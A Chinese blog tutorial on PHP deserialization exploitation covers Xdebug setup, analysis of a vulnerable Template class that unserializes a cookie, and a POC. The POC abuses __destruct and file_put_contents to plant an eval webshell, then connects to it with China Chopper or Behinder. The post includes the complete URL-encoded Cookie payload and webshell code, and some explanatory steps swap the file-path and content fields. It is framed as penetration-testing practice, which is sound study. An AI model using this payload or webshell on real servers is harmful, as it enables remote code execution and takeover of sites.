PHP反序列化练习讲解

于 2024-08-28 14:02:59 发布
阅读量720 收藏 10
点赞数 22
分类专栏: PHP编程与系统开发 网络安全 渗透测试 文章标签: php 开发语言 代码审计
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/YhMjQx/article/details/141639172
版权

文章目录

PHP反序列化练习讲解

一、PHP远程调试安装配置

1、安装VSCode插件

无论远程还是本地调试,都需要在VSCode中安装PHP Debug插件,顺便也把智能提示安装在远程,实现智能提示

xampp5.6建议安装xdebug2.5.5

将xdebug2.5.5解压

unzip xdebug-master.zip

2、配置

cd xdebug-master
/opt/lampp/bin/phpize

如果出现

Cannot find autoconf. Please check your autoconf installation and the
$PHP_AUTOCONF environment variable. Then, rerun this script.


yum install autoconf

然后重新 /opt/lampp/bin/phpize

接下来

./configure --enable-xdebug --with-php-config=/opt/lampp/bin/php-config
make
make install

取得扩展文件xdebug.so的路径

Installing shared extensions:     /opt/lampp/lib/php/extensions/no-debug-non-zts-20131226/

修改 /opt/lampp/etc/php.ini 在Module Settings 节点下添加

[XDebug]
zend_extension=/opt/lampp/lib/php/extensions/no-debug-non-zts-20131226/xdebug.so
xdebug.remote_enable = 1		; 开启远程调试功能
xdebug.remote_autostart = 1	     ; 自动启动
xdebug.remote_handler = "dbgp"	 ; 调试处理器
xdebug.remote_port = "9003"		 ; 端口号
xdebug.remote_host = "192.168.230.188"	; 远程调试的IP地址,即PHP所在服务器IP

配置VSCode中的XDebug,确保端口一致

image-20240827000931337

image-20240827000900645

二、目标代码分析

<?php

class Template{
    var $cacheFile = "cache.txt";
    var $template = "<div>Welcome back %s</div>";

    function __construct($data = null) {
        $data = $this->loadData($data);
        $this->render($data);
    }

    function loadData($data) {
        return unserialize($data);  // 
        return [];
    }

    function createCache($file = null,$tpl = null) {
        $file = $file ?: $this->cacheFile;
        $tpl = $tpl ?; $this->template;
        file_put_contents($file,$tpl);
    }

    function render($data) {
        echo sprintf($this->template,htmlspecialchars($data['name']));
    }

    function __destruct() {
        $this->createCache();
    }

}

new Template($_COOKIE['data']);

?>

实现对以上代码的Payload构造,并实现写入木马的功能

  • 看运行的代码(即函数之外的代码,类似于C语言中的main函数中的内容),这里是 new Template($_COOKIE['data']); 直接实例化一个Template对象,与之前的直接 unserialize() 不一样

  • 由于此处是直接实例化对象,所以首先运行的是 __construct() 函数,并且 $data 赋值为 $_COOKIE['data']

  • __construct() 函数首先调用 loadData 函数 ,该函数就会对 $data 中的序列化值进行反序列化,序列化值后返回,此时 return []; 这段代码是不会执行的,一个函数中 return 之后的代码都不会执行,从语法上就是错误的

  • return unserialize($data); 之后就又回到了 __construct() 函数 下一步进行 $this->render($data);

  • 按照之前的思路,序列化的 $data 值经过反序列化之后应该是一个类的实例,但是这种情况放在这里的话就是错的,因为类的实例是无法通过数组的方式取值的 $data['name'] 所以这一步代码就会报错,从而代码停止执行,那么后面的代码也就别想再运行了

  • 但是我们的终点在 file_put_contents($file,$tpl); 这句代码,并且 $file 需要是木马,而这句代码在 createCache 函数中调用,而 createCache 函数又被 __destruct() 所调用,所以无论如何,应该要让我们构造的序列化值经过反序列化可以运行到 __destruct() 函数

  • 所以需要让构造的序列值原本是一个数组,数组中是一个Template的实例,然后序列化通过$_COOKIE['data']传值给$data

  • 此时 render 函数调用结束,则 __construct() 函数调用结束,接下来才可以进入 __destruct() 函数,从而调用 createCache

  • $file = $file ?: $this->cacheFile; 的意思是,如果 $file 不是空(表示真),则 $file = $file; 否则 $file 是空(表示假),此时 $file = $this->cacheFile;

  • 又因为此时的createCache函数参数中默认 $file 就是空,所以 $file = $this->cacheFile; 又因为反序列化时,我们构造 $this->cacheFile<?php @eval($_POST['code']);?>

  • 同理可得 构造 $this->template 为 可写的目录,例如 ../temp/unserializeshell.php

  • 再通过 file_put_contents 就可以将木马写入 ../temp/unserializeshell.php 文件中

  • 其中 createCache 函数一共会执行两次,第一次是反序列化的数组中的实例在调用

  • 第二次是new的对象在调用

使用VSCode调试代码(过调试截图有跳跃)

VSCode调试这里直接到unserialize这一步

image-20240827182319047

unserialize执行之后直接就回到了__construct

image-20240827182347187

然后调用render函数,该函数调用完之后,就会从__construct__destruct,去就是执行 createCache 函数,此时第一次执行的 __destruct 是反序列化的实例在执行

image-20240827182530120

然后此次__destruct函数执行结束之后就会立刻再执行一次 __destruct 此时是由 new 的Template实例在执行 __destruct

image-20240827182745836

image-20240827182753184

三、POC生成

<?php
class Template{
    var $cacheFile = "temp/unserializeshell.php";
    var $template = '<?php @eval($_POST["code"])';

}
$a = new Template();
$b = array($a);  // 需要将实例数组化的原因是为了执行render函数时可以不会报错导致后面代码无法执行,因为只有数组才可以用中括号取值
echo urlencode(serialize($b));
  
?>

如果不将实例数组化,就会因为致命错误导致后面代码无法执行,则木马也就根本无法写入

O:8:"Template":2:{s:9:"cacheFile";s:25:"temp/unserializeshell.php";s:8:"template";s:30:"<?php @eval($_POST["code"]);?>";}

这是没有数组化的实例序列化后的值

image-20240827184030340

我们发送给漏洞页面看看

image-20240827184205543

报错报的是致命错误

而使用数组化后的序列值出现的问题就是Notice注意,并且有Welcome back输出

image-20240827184144258

访问 http://192.168.230.188/unserializevul/unserializePOC.php 获得POC,然后构造Cookie

如果不采用URL编码形式的话,构造的POC会因显示问题 <> 内的东西都会不显示

image-20240827183435847

image-20240827183455194

当然,如果使用源代码中的内容也是可以的,当然,最好的还是使用URL编码,因为即使是URL编码在发送数据之后也会被浏览器解析

Cookie:data=a%3A1%3A%7Bi%3A0%3BO%3A8%3A%22Template%22%3A2%3A%7Bs%3A9%3A%22cacheFile%22%3Bs%3A25%3A%22temp%2Funserializeshell.php%22%3Bs%3A8%3A%22template%22%3Bs%3A30%3A%22%3C%3Fphp+%40eval%28%24_POST%5B%22code%22%5D%29%3B%3F%3E%22%3B%7D%7D

访问 http://192.168.230.188/unserializevul/unserializevultest_01.php

image-20240827002333446

此时木马已被写入

四、木马利用

image-20240827184633920

之后就可以菜刀或冰蝎链接

CISP-PTE实操练习讲解
lza20001103的博客
07-05 4118
CISP-PTE实操练习讲解
CISP-PTE实操练习讲解二(新版)
lza20001103的博客
08-06 7342
CISP-PTE实操练习讲解二(新版)
PHP-Code 项目使用教程
最新发布
gitblog_00555的博客
08-19 371
PHP-Code 项目使用教程 PHP-Code通过ThinkPHP框架学习PHP代码审计项目地址:https://gitcode.com/gh_mirrors/ph/PHP-Code 1. 项目的目录结构及介绍 PHP-Code/ ├── config/ │ ├── database.php │ └── settings.php ├── src/ │ ├── controllers...
PHP Code码生成
罗小文
07-26 389
/** * 生成随机数 * @param $len * @return string */ public function GetRandStr($len) { $chars = array("A","B","C","D","E","F","G","H","I","J","K","L","M","N","O","P","Q","R","S","T","U","V","W","X","Y","Z","a", "b", "c","d", "e",
php 生成 code
jim的博客
09-15 221
/** * 生成执行格式的字符串 POB-00000001 * @param string $prex POB- * @param $key 1 * @param int $length 填仓位数 */ function FullString($prex, $key,$length = 7,$char = '0'){ if (($len = $length-strlen($key)) <=0) $len = 0; $str = str_repeat($char,$len.
PHP-Code 项目教程
gitblog_00371的博客
08-19 960
PHP-Code 项目教程 PHP-Code通过ThinkPHP框架学习PHP代码审计项目地址:https://gitcode.com/gh_mirrors/ph/PHP-Code 项目介绍 PHP-Code 是一个开源的 PHP 项目,旨在提供一系列实用的 PHP 代码示例和工具,帮助开发者快速构建和优化 PHP 应用程序。该项目由 lu2ker 维护,源代码托管在 GitHub 上,地址为:...
php 一维码生成_php实现生成code128条形码的方法详解
weixin_33162074的博客
03-08 544
本文实例讲述了php实现生成code128条形码的方法。分享给大家供大家参考,具体如下:效果图:class BarCode128 {const STARTA = 103;const STARTB = 104;const STARTC = 105;const STOP = 106;private $unit_width = 1; //单位宽度 缺省1个象素private $is_set_height...
PHP反序列化入门手把手详解
顶峰
02-08 1984
php
攻防世界题目练习——Web难度1(二)_&lt; php highlight_file(__file__); include(&quot;(1)
2301_79054215的博客
04-20 1307
是Linux中的一个特殊变量,它代表了当前的字段分隔符,它的默认值是空格、制表符和换行符,当输入命令时,会以空格、制表符或换行符作为分隔符,将输入的内容分割成不同的字段,每个字段将作为命令的一个参数进行解析和执行。现在我们知道了waf函数过滤的有哪些字符或字符串,我们要避免直接输入这些关键词,但是有些字符在我们查找flag的过程中不可避免地会用到,因此我们对它们进行绕过,绕过的方式有如下几种。函数进行了匹配,第一个参数是给定的用来模式匹配的正则表达式,第二个参数是输入的要匹配的字符串。
PHP COOKIE详细讲解及应用实现
Strugglin的博客
05-26 1101
首先了解一下什么是cookie ?cookie是服务器留在用户计算机中的一小段文本信息可以实现多个页面的数据交换下面来张图了解一下cookle的机制当用户访问浏览器时,服务器会生成对应的cookie并发送到浏览器,浏览器会保存这个cookie,当用户下次再访问时浏览器会带上这个cookie一并请求服务器cookle的创建  setcookie(name,value,[expire,path,dom...
php codephp codephp code
09-20
php codephp codephp codephp codephp codephp codephp codephp code
PHP 代码质量检查那些事
just_php的专栏
09-14 1437
一、简介 你是否因为一遍又一遍地捍卫代码质量而感到厌倦?该如何保证 PHP 的代码质量,我们首先想到的是要遵循代码规范,良好的代码风格和编码习惯,虽然说 PSR 给出了良好的规范标准,但是光靠人工遵守难免会把握不到位,我们常说:立规范不如做工具。本篇来介绍一下 PHP 可用的静态代码质量检查工具,可以提前在你本地编辑器编写代码的时候就对你的 "Bad Coding" 代码做出提醒和预警,防止代码部署后,在运行时才发现问题而造成事故。 二、代码质量的检查层次 我把代码质量划分了四个检查层次:基础语法
使用phpqrcode生成二维码
热门推荐
江南极客
06-28 8万+
使用PHP语言生成二维码,还是挺有难度的,当然调用生成二维码图片的接口(比如:联图网http://www.liantu.com/的接口)除外,如果自己写代码生成,真的无从下手。然而,我们可以使用phpqrcode这个现成的类文件,PHP二维码生成类库,利用它可以轻松生成二维码。
php barcode_php如何生成条形码方法详解
weixin_39564617的博客
03-09 446
这篇文章主要介绍了php实现生成code128条形码的方法,结合完整实例形式给出了php条形码生成类的定义与使用方法,需要的朋友可以参考下本文实例讲述了php实现生成code128条形码的方法。分享给大家供大家参考,具体如下:效果图:class BarCode128 {const STARTA = 103;const STARTB = 104;const STARTC = 105;const ST...
Visual Studio Code配置PHP开发环境
魔术猿-Vezn
07-20 3万+
准备工作: 1.下载Visual Studio Code 2.下载xampp,因为套装省事,对于个人使用是很方便 3.下载xdebug,记得要对应php版本的,否则无效 步骤: 1.在Visual Studio Code安装php相关插件 2.在首选项里面配置php路径 3.把Xdebug的dll放到php相关目录下面 4.在php.ini最后加上下面代
PHP - 代码简写 - 收集/实践
"代码"的日常搬运
07-30 5113
1.应用场景 就是为了简写代码,但是有时并不推荐,因为可读性不好. 2.学习/操作 1.使用变量初始值,一行代码即可完成字符串拼接 //code 简写: $file_names = ''; for ($i=0;$i<5;$i++){ if($i==0){ $postData['attachment_id'] = iss...
code.php验证码,PHP code 验证码生成类定义和简单使用示例
weixin_42393526的博客
03-09 316
本文实例讲述了PHP code 验证码生成类定义和简单使用。分享给大家供大家参考,具体如下:code.phpnamespace code;/*** Class Code*/class Code{protected $number;//验证码内字符个数protected $codeType;//验证码样式protected $width;//图像宽protected $height;//图像高pro...
PHP_CodeSniffer 使用攻略
abcde158308的博客
01-17 773
目录安装 PHP_CodeSniffer安装 phpcsphpcs 是 PHP 代码规范的检测工具。# 下载 $ curl -OL https://squizlabs.github.io/PHP_CodeSniffer/phpcs.phar # 加入到命令目录 $ mv phpcs.phar /usr/local/bin/phpcs # 赋予执行权限 $ sudo chmod +x /usr/lo...
phpcode生成二维码
vivid的博客
12-15 309
用windows下用phpcode生成二维码 1.首先要保证php.ini的gd库打开。 2.下载phpcode源码 3.加载进来 二维码生成有两种模式,一种是不带自己logo的,一中是带自己logo的 一:原生的,不带自己logo的二维码 php 代码如下, url只是生成二维码后的连接地址 include_once('ortherlib/phpqrcode/phpqrcod
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值